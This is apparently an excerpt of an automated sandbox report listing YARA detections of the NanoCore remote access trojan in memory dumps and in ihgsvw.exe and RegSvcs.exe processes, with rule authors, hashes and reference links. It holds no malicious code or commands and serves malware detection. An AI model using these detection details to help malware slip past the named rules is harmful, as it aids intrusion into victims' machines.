      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
